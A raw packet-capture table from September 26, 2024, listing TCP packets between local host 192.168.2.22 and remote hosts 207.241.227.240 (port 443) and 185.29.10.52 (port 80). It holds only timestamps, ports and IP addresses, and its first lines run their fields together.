                        Sep 26, 2024 10:33:11.162602901 CEST49162443192.168.2.22207.241.227.240
                        Sep 26, 2024 10:33:11.163933039 CEST49162443192.168.2.22207.241.227.240
                        Sep 26, 2024 10:33:11.183069944 CEST44349162207.241.227.240192.168.2.22
                        Sep 26, 2024 10:33:11.183095932 CEST44349162207.241.227.240192.168.2.22
                        Sep 26, 2024 10:33:11.183144093 CEST49162443192.168.2.22207.241.227.240
                        Sep 26, 2024 10:33:11.183176041 CEST44349162207.241.227.240192.168.2.22
                        Sep 26, 2024 10:33:11.183196068 CEST49162443192.168.2.22207.241.227.240
                        Sep 26, 2024 10:33:11.184879065 CEST49162443192.168.2.22207.241.227.240
                        Sep 26, 2024 10:33:11.234867096 CEST44349162207.241.227.240192.168.2.22
                        Sep 26, 2024 10:33:11.234898090 CEST44349162207.241.227.240192.168.2.22
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Sep 26, 2024 10:33:11.235096931 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.235097885 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.235131979 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.235539913 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.235559940 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.235591888 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.235609055 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.235622883 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.248801947 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.248827934 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.248879910 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.248915911 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.248934984 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.249388933 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.249411106 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.249439001 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.249452114 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.249465942 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.250161886 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.250195980 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.250221014 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.250228882 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.250258923 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.250829935 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.250850916 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.250890017 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.250900984 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.250931978 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.251523972 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.251555920 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.251570940 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.251580000 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.251609087 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.271719933 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.271740913 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.271791935 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.271835089 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.271857023 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.284672022 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.324474096 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.324502945 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.324574947 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.324574947 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.324609041 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.325138092 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.337080002 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.337105989 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.337142944 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.337155104 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.337169886 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.337732077 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.337759018 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.337785959 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.337795973 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.337811947 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.338408947 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.338429928 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.338463068 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.338473082 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.338499069 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.338762999 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.338788033 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.338814974 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.338824034 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.338843107 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.339821100 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.339840889 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.339874029 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.339888096 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.339903116 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.340306997 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.340361118 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.340384007 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.340404034 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.340415001 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.340431929 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.349838972 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.349957943 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.360536098 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.360562086 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.360620975 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.360630035 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.360651970 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.384010077 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.412792921 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.412821054 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.412893057 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.412908077 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.412959099 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.420281887 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.425997972 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.426021099 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.426090002 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.426110983 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.426135063 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.426652908 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.426681042 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.426718950 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.426738977 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.426765919 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.426765919 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.427345037 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.427372932 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.427423954 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.427423954 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.427443027 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.427541971 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.427989006 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.428019047 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.428046942 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.428066969 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.428090096 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.428838015 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.428860903 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.428895950 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.428916931 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.428941011 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.428941011 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.448868036 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.448899031 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.448941946 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.448966980 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.448992968 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.449971914 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.501208067 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.501233101 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.501318932 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.501342058 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.501367092 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.501895905 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.501924992 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.501966953 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.501967907 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.501983881 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.502013922 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.514720917 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.514745951 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.514794111 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.514816046 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.514839888 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.515377998 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.515425920 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.515429020 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.515444994 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.515475988 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.516218901 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.516239882 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.516269922 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.516269922 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.516285896 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.516313076 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.516619921 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.516788960 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.516815901 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.516840935 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.516860008 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.516901016 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.516942978 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.517625093 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.517647982 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.517683029 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.517714024 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.517740011 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.521847010 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.537745953 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.537771940 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.537818909 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.537843943 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.537868977 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.537868977 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.593677998 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.593709946 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.593750954 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.593772888 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.593820095 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.593820095 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.594186068 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.594207048 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.594244957 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.594264984 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.594290018 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.594290018 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.603499889 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.603528023 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.603579044 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.603579044 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.603595972 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.603626013 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.604257107 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.604285002 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.604342937 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.604342937 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.604365110 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.604393959 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.604790926 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.604819059 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.604847908 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.604868889 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.604891062 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.605660915 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.605683088 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.605721951 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.605741024 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.605763912 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.605763912 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.606170893 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.606198072 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.606247902 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.606249094 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.606264114 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.626557112 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.626575947 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.626737118 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.626760006 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.626784086 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.682517052 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.682559013 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.682583094 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.682600021 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.682630062 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.682910919 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.682919025 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.682961941 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.682966948 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.682976007 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.683007956 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.683021069 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.692466974 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.692497015 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.692538977 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.692559004 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.692584038 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.692584038 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.693105936 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.693126917 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.693164110 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.693183899 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.693207026 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.694170952 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.694212914 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.694225073 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.694238901 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.694266081 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.694575071 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.694621086 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.694624901 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.694637060 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.694680929 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.695185900 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.695209980 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.695250034 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.695270061 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.695296049 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.695296049 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.715523958 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.715569973 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.715585947 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.715600967 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.715631008 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.771634102 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.771666050 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.771723986 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.771745920 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.771774054 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.771779060 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.771779060 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.771836042 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.771850109 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.771869898 CEST  443  49162  207.241.227.240  192.168.2.22
Sep 26, 2024 10:33:11.771881104 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.771919966 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.774137974 CEST  49162  443  192.168.2.22  207.241.227.240
Sep 26, 2024 10:33:11.832273960 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:11.837781906 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:11.837855101 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:11.837939024 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:11.843174934 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.474556923 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.474611044 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.474647999 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.474673986 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.474682093 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.474718094 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.474749088 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.474751949 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.474795103 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.570207119 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.570245028 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.570277929 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.570302010 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.570312023 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.570363045 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.570382118 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.570432901 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.570465088 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.570488930 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.570499897 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.570559025 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.570576906 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.571341991 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.571403027 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.666102886 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.666280985 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.666310072 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.666337967 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.666342020 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.666374922 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.666399956 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.666407108 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.666452885 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.666887045 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.666938066 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.666971922 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.666985989 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.667005062 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.667047977 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.667597055 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.667664051 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.667711973 CEST  49163  80  192.168.2.22  185.29.10.52
Sep 26, 2024 10:33:12.667712927 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.667746067 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.667778015 CEST  80  49163  185.29.10.52  192.168.2.22
Sep 26, 2024 10:33:12.667789936 CEST  49163  80  192.168.2.22  185.29.10.52
